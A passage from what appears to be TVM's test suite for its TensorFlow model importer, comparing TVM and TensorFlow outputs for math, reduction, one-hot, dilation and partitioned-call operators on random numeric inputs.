_test_forward_unary(tf.asin, -1, 1)
_test_forward_unary(tf.atanh, -1, 1)
_test_forward_unary(tf.sinh)
_test_forward_unary(tf.cosh)
_test_forward_unary(tf.acosh)
_test_forward_unary(tf.asinh)
_test_forward_unary(tf.atan)
_test_forward_unary(tf.sin)
_test_forward_unary(tf.cos)
_test_forward_unary(tf.tan)
_test_forward_unary(tf.tanh)
_test_forward_unary(tf.erf)
_test_forward_unary(tf.log)
_test_forward_unary(tf.log1p)
def test_forward_atan2():
"""test operator tan"""
tf.disable_eager_execution()
np_data_1 = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
np_data_2 = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
in_data_1 = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_1")
in_data_2 = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_2")
tf.atan2(in_data_1, in_data_2, name="atan2")
compare_tf_with_tvm([np_data_1, np_data_2], ["in_data_1:0", "in_data_2:0"], "atan2:0")
def test_forward_expm1():
"""test operator expm1"""
def _test_forward_expm1(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(1, 10, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.expm1(in_data, name="expm1")
compare_tf_with_tvm([np_data], ["in_data:0"], "expm1:0")
_test_forward_expm1([1, 100])
_test_forward_expm1([1, 10, 10])
_test_forward_expm1([2, 5, 2, 5])
def test_forward_softsign():
"""test operator softsign"""
def _test_forward_softsign(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(1, 100, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.nn.softsign(in_data, name="softsign")
compare_tf_with_tvm([np_data], ["in_data:0"], "softsign:0")
_test_forward_softsign([1, 100])
_test_forward_softsign([1, 10, 10])
_test_forward_softsign([2, 5, 2, 5])
def test_forward_rint():
"""test operator rint"""
def _test_forward_rint(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(-100, 100, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.math.rint(in_data, name="rint")
compare_tf_with_tvm([np_data], ["in_data:0"], "rint:0")
_test_forward_rint([100])
_test_forward_rint([1, 100])
_test_forward_rint([1, 10, 10])
_test_forward_rint([2, 5, 2, 5])
def test_forward_negative():
"""test tf operator Neg"""
np_data = np.random.uniform(-100, 255, size=(224, 224, 3)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (224, 224, 3), name="in_data")
tf.negative(in_data, name="negative")
compare_tf_with_tvm([np_data], ["in_data:0"], "negative:0")
def test_forward_log_softmax():
"""test operator LogSoftmax"""
np_data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (9, 11), name="in_data")
tf.math.log_softmax(in_data, name="LogSoftmax")
compare_tf_with_tvm([np_data], ["in_data:0"], "LogSoftmax:0")
def test_forward_softplus():
"""test operator Softplus"""
np_data = np.random.uniform(1, 10, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
tf.nn.softplus(in_data, name="softplus")
compare_tf_with_tvm([np_data], ["in_data:0"], "softplus:0")
def test_forward_rsqrt():
"""test Rsqrt"""
np_data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.rsqrt(in_data, name="rsqrt")
compare_tf_with_tvm([np_data], ["in_data:0"], "rsqrt:0")
def test_forward_sqrt():
"""test Sqrt"""
np_data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.sqrt(in_data, name="sqrt")
compare_tf_with_tvm([np_data], ["in_data:0"], "sqrt:0")
def _test_forward_right_shift(in_shape, dtype):
"""test operator RightShift"""
lh_data = np.random.randint(1, 3, size=in_shape).astype(dtype)
rh_data = np.random.randint(1, 8, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, in_shape, name="lft_data")
rgt_data = tf.placeholder(dtype, in_shape, name="rgt_data")
tf.bitwise.right_shift(lft_data, rgt_data, name="RightShift")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "RightShift:0")
def test_forward_right_shift():
_test_forward_right_shift((7,), "int32")
_test_forward_right_shift((3, 11), "int16")
def _test_forward_left_shift(in_shape, dtype):
"""test operator LeftShift"""
lh_data = np.random.randint(100, 1000000, size=in_shape).astype(dtype)
rh_data = np.random.randint(1, 3, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, in_shape, name="lft_data")
rgt_data = tf.placeholder(dtype, in_shape, name="rgt_data")
tf.bitwise.left_shift(lft_data, rgt_data, name="LeftShift")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "LeftShift:0")
def test_forward_left_shift():
_test_forward_left_shift((10,), "int32")
_test_forward_left_shift((224, 224, 3), "int16")
#######################################################################
# Mean
# ----
def test_forward_mean():
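    """test operator Mean"""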
def check_mean(ishape, **kwargs):
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.keras.backend.mean(in1, **kwargs)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Mean:0", no_gpu=True)
check_mean((10, 8, 16, 32))
check_mean((10, 8, 16, 32), axis=(2, 3))
check_mean((10, 8, 16, 32), axis=(1, 2), keepdims=True)
#######################################################################
# Size
# ----
def test_forward_size():
def check_size(ishape):
np_input = np.random.uniform(size=ishape).astype(np.float32)
# if all dimensions are constant, TF will optimize away size operator into constant
tf_input_shape = list(np_input.shape)
tf_input_shape[0] = None
with tf.Graph().as_default():
input = tf.placeholder(shape=tf_input_shape, dtype=np_input.dtype, name="input")
tf.size(input, name="size")
compare_tf_with_tvm([np_input], ["input:0"], "size:0")
check_size((10, 8, 16, 32))
check_size((10,))
#######################################################################
# All, Any, Max, Min, Prod, variance, std, logsumexp, euclidean_norm
# ------------------------------------------------------------------
def test_forward_reduce():
def _check_op(tf_op, ishape, axis, keepdims, dtype="float32"):
tf.reset_default_graph()
if dtype == "bool":
np_data = np.random.choice([True, False], size=ishape)
else:
np_data = np.random.uniform(size=ishape).astype(dtype)
if tf_op == tf.math.reduce_prod:
axis = 1
np_data = np_data.reshape(1, -1)
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, name="in_data")
reduce_op = tf_op(in_data, axis=axis, keepdims=keepdims, name="reduce_std")
compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)
def _test_math_op(op, dtypes=["int32", "float32"]):
for dtype in dtypes:
_check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
_check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
_test_math_op(tf.math.reduce_all, dtypes=["bool"])
_test_math_op(tf.math.reduce_any, dtypes=["bool"])
_test_math_op(tf.math.reduce_max)
_test_math_op(tf.math.reduce_min)
_test_math_op(tf.math.reduce_prod)
_test_math_op(tf.math.reduce_variance, dtypes=["float32"])
_test_math_op(tf.math.reduce_std, dtypes=["float32"])
_test_math_op(tf.math.reduce_logsumexp, dtypes=["float32"])
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
_test_math_op(tf.math.reduce_euclidean_norm)
#######################################################################
# All, Max, Min
# ------------------------------------------------------------------
def test_forward_raw_reduce():
def _check_op(tf_op, ishape, axis, keepdims, range_axis=False, dtype="float32"):
tf.reset_default_graph()
if dtype == "bool":
np_data = np.random.choice([True, False], size=ishape)
else:
np_data = np.random.uniform(size=ishape).astype(dtype)
if tf_op == tf.math.reduce_prod:
axis = 1
np_data = np_data.reshape(1, -1)
with tf.Graph().as_default():
if range_axis:
axis = tf.range(axis[0], axis[1], axis[2], name="range", dtype="int32")
in_data = tf.placeholder(dtype, name="in_data")
reduce_op = tf_op(input=in_data, axis=axis, keep_dims=keepdims, name="reduce_std")
compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)
def _test_raw_reduce_op(op, dtypes=["int32", "float32"]):
for dtype in dtypes:
_check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
_check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 4, 1), keepdims=True, range_axis=True, dtype=dtype)
_check_op(
op, (2, 3, 10, 10), axis=(1, 3, 1), keepdims=True, range_axis=True, dtype=dtype
)
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_raw_reduce_op(tf.raw_ops.All, dtypes=["bool"])
_test_raw_reduce_op(tf.raw_ops.Max)
_test_raw_reduce_op(tf.raw_ops.Min)
#######################################################################
# Relational operators
# --------------------
def _test_forward_rel_op(data, func):
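    """One iteration of a relational operator, casting the boolean result to int32"""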
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data[0].shape, dtype=data[0].dtype, name="in1")
in2 = tf.placeholder(shape=data[1].shape, dtype=data[1].dtype, name="in2")
op = func(in1, in2, name="op")
out = tf.cast(op, tf.int32, name="out1")
compare_tf_with_tvm([data[0], data[1]], ["in1:0", "in2:0"], "out1:0")
def test_forward_rel_ops():
t1 = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
t2 = np.array([[9, 8, 7], [6, 5, 4], [3, 2, 1]])
_test_forward_rel_op([t1, t2], math_ops.less)
_test_forward_rel_op([t1, t2], math_ops.greater)
_test_forward_rel_op([t1, t2], math_ops.less_equal)
_test_forward_rel_op([t1, t2], math_ops.greater_equal)
_test_forward_rel_op([t1, t2], math_ops.equal)
_test_forward_rel_op([t1, t2], math_ops.not_equal)
#######################################################################
# ExpandDims
# ----------
def _test_forward_expand_dims(data, axis):
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="in1")
out = tf.expand_dims(in1, axis)
compare_tf_with_tvm([data], [in1.name], out.name)
def test_forward_expand_dims():
_test_forward_expand_dims(np.int32(1), 0)
_test_forward_expand_dims(np.array([1]), 0)
_test_forward_expand_dims(np.array([1]), -1)
_test_forward_expand_dims(np.array([[1], [2]]), 0)
_test_forward_expand_dims(np.array([[1], [2]]), 1)
_test_forward_expand_dims(np.array([[1], [2]]), -1)
#######################################################################
# Maximum, Minimum
# ----------------
def test_forward_maximum():
"""test Op Maximum"""
def check_maximum(lh_shape, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.math.maximum(lft_data, rgt_data, name="maximum")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "maximum:0")
check_maximum((10, 8, 16, 32), (1,), dtype="int32")
check_maximum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
def test_forward_minimum():
"""test Op Minimum"""
def check_minimum(lh_shape, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.math.minimum(lft_data, rgt_data, name="minimum")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "minimum:0")
check_minimum((10, 8, 16, 32), (1,), dtype="int32")
check_minimum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
#######################################################################
# PlaceholderWithDefault
# ----------------------
def test_placeholder():
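    """test PlaceholderWithDefault mixed with Placeholder and Variable inputs"""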
with tf.Graph().as_default():
in_data1 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
var1 = tf.Variable(in_data1, name="in1")
var2 = array_ops.placeholder_with_default(var1, None, name="place1")
in_data2 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
place1 = array_ops.placeholder(shape=in_data1.shape, dtype=in_data1.dtype, name="in2")
out1 = tf.math.add(var1, var2, name="out1")
out2 = tf.math.add(out1, place1, name="out2")
compare_tf_with_tvm(
[in_data1, in_data2], ["place1:0", "in2:0"], "out2:0", init_global_variables=True
)
#######################################################################
# OneHot
# ----------------------
def _test_forward_one_hot(indices_shape, depth, on_value, off_value, axis, out_dtype):
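    """One iteration of OneHot with the given indices shape, depth, on/off values and axis"""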
inp_array1 = np.random.randint(0, 5, size=indices_shape)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array1.shape, dtype=inp_array1.dtype)
out = tf.one_hot(in1, depth, on_value, off_value, axis, dtype=out_dtype)
compare_tf_with_tvm(inp_array1, in1.name, out.name)
def test_forward_one_hot():
_test_forward_one_hot((3,), 3, 1, 0, -1, "int32")
_test_forward_one_hot((3,), 3, 1.0, 0.0, -1, "float32")
_test_forward_one_hot((2, 2), 5, 2, -2, 0, "int32")
_test_forward_one_hot((2, 2), 5, 0.5, -0.5, 1, "float32")
_test_forward_one_hot((3, 2, 4, 5), 6, 1, 0, 1, "int32")
_test_forward_one_hot((3, 2, 4, 5), 6, 1.0, 0.0, 0, "float32")
#######################################################################
# AddN
# ----------------------
def _test_forward_add_n(inputs):
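    """One iteration of AddN over the given list of inputs"""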
tf.reset_default_graph()
with tf.Graph().as_default():
temp = []
for each in inputs:
temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
output = tf.add_n(temp)
compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def test_forward_add_n():
x = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
y = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
z = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
m, n, o = x.astype(np.float32), y.astype(np.float32), z.astype(np.float32)
in0 = x
in1 = [x, y]
in2 = (x, y, z)
in3 = m
in4 = [m, n]
in5 = (m, n, o)
_test_forward_add_n(in0)
_test_forward_add_n(in1)
_test_forward_add_n(in2)
_test_forward_add_n(in3)
_test_forward_add_n(in4)
_test_forward_add_n(in5)
#######################################################################
# Sharing params case
# ----------------------
def test_sharing_node():
"""Test the sharing params case."""
np_data = np.random.uniform(size=(2, 2, 2)).astype("float32")
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, shape=(2, 2, 2), name="in_data")
axis = tf.constant([-1], dtype=tf.int32, name="axis")
mean0 = tf.reduce_mean(in_data, axis=axis, keepdims=False, name="mean0")
mean1 = tf.reduce_mean(in_data, axis=axis, keepdims=False, name="mean1")
out = tf.add(mean0, mean1, name="out")
compare_tf_with_tvm([np_data], ["in_data:0"], "out:0")
#######################################################################
# Unravel Index
# ----------------------
def _test_forward_unravel_index(inputs):
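    """One iteration of UnravelIndex with indices and dims fed as placeholders"""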
tf.reset_default_graph()
with tf.Graph().as_default():
temp = []
for each in inputs:
temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
output = tf.unravel_index(temp[0], temp[1])
compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def _test_forward_unravel_index_scalar(x, y, dtype="int32"):
tf.reset_default_graph()
with tf.Graph().as_default():
indices_1 = constant_op.constant(x, dtype=dtype)
dims_1 = constant_op.constant(y, dtype=dtype)
out_1 = array_ops.unravel_index(indices_1, dims_1)
compare_tf_with_tvm([], [], out_1.name)
def test_forward_unravel_index():
x = np.array([0, 1, 2, 3])
y = np.array([2, 2])
_test_forward_unravel_index([x, y])
x = np.array([0, 1, 2, 5])
y = np.array([2, 3])
_test_forward_unravel_index([x, y])
x = np.array([0, 1, 2, 5])
y = np.array([6])
_test_forward_unravel_index([x, y])
x = np.array([102, 300, 16])
y = np.array([10, 10, 9, 6])
_test_forward_unravel_index([x, y])
x = np.array([100])
y = np.array([10, 10, 9, 6])
_test_forward_unravel_index([x, y])
# Test scalar input
_test_forward_unravel_index_scalar(13, [1, 4, 5, 2])
#######################################################################
# Dilation2d
# ----------------------
def _test_dilation2d(tensor_in_sizes, filter_in_sizes, strides, dilations, padding):
"""One iteration of dilation2d with given shapes and attributes"""
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
nn_ops.dilation2d(in_data, in_filter, strides=strides, rates=dilations, padding=padding)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Dilation2D:0",
no_gpu=True,
)
def test_forward_dilation():
_test_dilation2d([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID")
_test_dilation2d([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME")
_test_dilation2d([1, 5, 5, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 5, 5, 1], [3, 3, 1], [1, 1, 1, 1], [1, 2, 2, 1], "VALID")
_test_dilation2d([1, 5, 5, 3], [3, 3, 3], [1, 1, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 28, 28, 3], [5, 5, 3], [1, 2, 2, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 224, 224, 10], [8, 8, 10], [1, 1, 1, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME")
_test_dilation2d([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID")
_test_dilation2d([1, 5, 5, 1], [7, 2, 1], [1, 3, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 5, 5, 1], [3, 4, 1], [1, 2, 1, 1], [1, 2, 2, 1], "SAME")
_test_dilation2d([1, 5, 5, 3], [3, 3, 3], [1, 1, 4, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 28, 28, 3], [5, 6, 3], [1, 1, 2, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 224, 224, 10], [8, 8, 10], [1, 3, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 2, 2, 1], "SAME")
_test_dilation2d([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 2, 1], "VALID")
def _test_identityn(data_np_list):
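    """One iteration of IdentityN over a list of input arrays"""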
with tf.Graph().as_default():
data_tensors = []
data_tensors_name = []
for index, data_np in enumerate(data_np_list):
tensor_name = f"data_{index}"
data_tensors_name.append(tensor_name + ":0")
data_tensors.append(
tf.placeholder(shape=data_np.shape, dtype=str(data_np.dtype), name=tensor_name)
)
output = tf.identity_n(data_tensors)
output_names = [out.name for out in output]
compare_tf_with_tvm(
data_np_list,
data_tensors_name,
output_names,
)
@pytest.mark.parametrize(
"data_np_list",
[
(
[
np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4, 5], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
]
),
(
[
np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
np.array([True, False, True]),
]
),
(
[
np.array([]),
np.array([[]]),
]
),
],
)
def test_forward_identityn(data_np_list):
_test_identityn(data_np_list)
#######################################################################
# infinity ops
# ------------
def _verify_infiniteness_ops(tf_op, name):
"""test operator infinity ops"""
# Only float types are allowed in Tensorflow for isfinite and isinf
# float16 is failing on cuda
tf_dtypes = ["float32", "float64"]
for tf_dtype in tf_dtypes:
shape = (8, 8)
data = np.random.uniform(size=shape).astype(tf_dtype)
        data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.inf
data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.nan
tf.reset_default_graph()
in_data = tf.placeholder(tf_dtype, shape, name="in_data")
tf_op(in_data, name=name)
compare_tf_with_tvm([data], ["in_data:0"], "{}:0".format(name))
def test_forward_isinf():
_verify_infiniteness_ops(tf.is_inf, "isinf")
def test_forward_isfinite():
_verify_infiniteness_ops(tf.is_finite, "isfinite")
def test_forward_isnan():
_verify_infiniteness_ops(tf.is_nan, "isnan")
def _test_spop_placeholder_without_shape_info():
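    """StatefulPartitionedCall fed from placeholders that carry no shape information"""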
with tf.Graph().as_default():
@function.Defun(*[tf.int32] * 2)
def Forward(x, y):
print(x.name)
print(y.name)
b = tf.add(x, y)
return b
pl1 = tf.placeholder(tf.int32, name="pl1")
pl2 = tf.placeholder(tf.int32, name="pl2")
pl3 = tf.placeholder(tf.int32, name="pl3")
data = np.array([[-1, 1], [2, -2]], dtype=np.int32)
data2 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
data3 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
z1 = gen_functional_ops.StatefulPartitionedCall(args=[pl1, pl2], Tout=[tf.int32], f=Forward)
z2 = z1 + pl3
compare_tf_with_tvm(
[data, data2, data3],
["pl1:0", "pl2:0", "pl3:0"],
["StatefulPartitionedCall:0", z2.name],
mode="vm",
init_global_variables=True,
)
def _test_spop_placeholder_with_shape_and_default_value():
with tf.Graph().as_default():
data = np.ones([1], dtype=int).astype(np.int32)
dataVar = tf.Variable(data, shape=data.shape)
pl1 = array_ops.placeholder_with_default(dataVar, shape=data.shape, name="pl1")
tpl = tf.convert_to_tensor(pl1, dtype=tf.int32)
@function.Defun(*[tf.int32])
def pl_with_default(pl):
return tf.expand_dims(tf.multiply(pl, pl), 0)
z = gen_functional_ops.StatefulPartitionedCall(
args=[tpl], Tout=[tf.int32], f=pl_with_default
)
compare_tf_with_tvm(
data, ["pl1:0"], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_placeholder_numpy_arange_feed():
with tf.Graph().as_default():
t1 = tf.placeholder(tf.int32, (3, 3, 3), "t1")
t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
t2 = tf.placeholder(tf.int32, (3, 3, 3), "t2")
t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
@tf.function
def add(x, y):
return tf.add(x, y, "add_t1_t2")
t3 = add(t1, t2)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
)
def _test_spop_placeholder_numpy_array_feed():
with tf.Graph().as_default():
t1_data = np.array([[-1, 1, 3], [2, -2, 4], [2, -3, 14]], dtype=np.int32)
t2_data = np.array([[-2, 1, 2], [12, -2, 14], [12, -3, 4]], dtype=np.int32)
t1 = tf.placeholder(tf.int32, name="t1")
t2 = tf.placeholder(tf.int32, name="t2")
@tf.function
def add(x, y):
return tf.add(x, y, "add_t1_t2")
t3 = add(t1, t2)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
)
def _test_spop_function_invocation_basic():
with tf.Graph().as_default():
def fun1(a):
return tf.multiply(a, a)
def fun2(b):
return tf.multiply(b, 10)
@tf.function
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
t3 = fun3(tf.constant(10.5), tf.constant(20.4))
compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_nested():
with tf.Graph().as_default():
t1 = tf.placeholder(tf.int32, (3, 3, 3), name="t1")
t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
t2 = tf.placeholder(tf.int32, name="t2")
t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
@tf.function
def myfunc(x, y):
return tf.add(x, y, "myfunc")
@tf.function
def myfunc2(x, y):
z = myfunc(x, y)
l = myfunc(z, y)
m = myfunc(l, z)
return tf.add(l, m, "myfunc2")
res1 = myfunc(t1, t2)
res2 = myfunc2(res1, t1)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [res2.name], mode="vm", init_global_variables=True
)
def _test_spop_function_invocation_no_autograph():
with tf.Graph().as_default():
@tf.function(autograph=False)
def fun1(a):
return tf.multiply(a, a)
@tf.function(autograph=False)
def fun2(b):
return tf.multiply(b, 10)
@tf.function
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
t3 = fun3(tf.constant(10.5), tf.constant(20.4))
compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_defun():
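    """StatefulPartitionedCall invoking a function defined with function.Defun"""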
with tf.Graph().as_default():
def fun1(a):
return tf.multiply(a, a)
def fun2(b):
return tf.multiply(b, b)
@function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[tf.constant(10.5), tf.constant(20.4)],
Tout=[dtypes.float32],
f=fun3,
name="SpopFnInvocation",
)
compare_tf_with_tvm([], [], "SpopFnInvocation:0", mode="vm", init_global_variables=True)
def _test_spop_arithmetic():
with tf.Graph().as_default():
@function.Defun(*[dtypes.int32] * 3)
def arithmetic(m, x, c):
z = tf.add(tf.multiply(m, x), c)
return z
m = tf.constant(10)
x = tf.constant(20)
c = tf.constant(2)
spopFn = gen_functional_ops.StatefulPartitionedCall(
args=[m, x, c], Tout=[tf.int32], f=arithmetic
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_control_flow():
with tf.Graph().as_default():
@function.Defun(*[dtypes.float32] * 2)
def Body1(x, y):
with ops.device("/job:localhost/replica:0/task:0/device:CPU:0"):
z = math_ops.multiply(x, y)
i = 0
while i < 10:
i += 1
if i == 5:
continue
z = math_ops.multiply(x, y * i)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[constant_op.constant(32.0), constant_op.constant(100.0)],
Tout=[dtypes.float32],
f=Body1,
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_variables():
with tf.Graph().as_default():
const1 = tf.constant(10)
const2 = tf.constant(20)
var1 = tf.Variable(const1, dtype=tf.int32)
var2 = tf.Variable(const2, dtype=tf.int32)
@function.Defun(tf.int32, tf.int32)
def Forward(x, y):
return tf.multiply(x, y)
z = gen_functional_ops.StatefulPartitionedCall(
args=[var1, var2], Tout=[tf.int32], f=Forward
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", init_global_variables=True, mode="vm"
)
def _test_spop_constants():
with tf.Graph().as_default():
@function.Defun(*[dtypes.int32] * 2)
def constantsFn(x, y):
vv = tf.constant([2, 3, 4], name="vv")
z = tf.add(vv + x, y)
return z
a = tf.constant(20000, name="a")
b = tf.constant(40000, name="b")
spopFn = gen_functional_ops.StatefulPartitionedCall(
args=[a, b], Tout=[tf.int32], f=constantsFn
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_stateful():
# This test case is to test that TVM rejects any TF stateful operations
# (including Resource Variables) except StatefulPartitionedCall/PartitionedCall
# (as these two operators can still be used as container graphs to execute
# "stateless" operations internally.
tf.reset_default_graph()
with tf.Graph().as_default():
@tf.function
def FunctionWithStatefulOp_One(i):
b = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
y = tf.multiply(b, i)
return y
@tf.function
def FunctionWithStatefulOp(m, n):
a = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
x = tf.multiply(a, m)
y = FunctionWithStatefulOp_One(n)
z = tf.multiply(x, y)
return z
op = FunctionWithStatefulOp(constant_op.constant(1.0), constant_op.constant(2.0))
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm([], [], [op.name], init_global_variables=True, mode="vm")
assert execinfo.value.args[0].startswith("The following operators are not implemented")
def _test_spop_device_assignment():
# This test case is to test that TVM rejects inconsistent device assignment
# while using StatefulPartitionedCall/PartitionedCall operators which in case of TVM will
# be used as container graphs to internally execute "stateless" operations.
tf.reset_default_graph()
with tf.Graph().as_default():
def fun1(a):
with ops.device("/GPU:0"):
return tf.multiply(a, a)
def fun2(b):
with ops.device("/job:localhost/replica:0/task:0/device:CPU:1"):
return tf.multiply(b, b)
@function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
def fun3(x, y):
with ops.device("/CPU:0"):
x = fun2(x)
with ops.device("/job:localhost/replica:0/task:0/device:CPU:2"):
y = fun1(y)
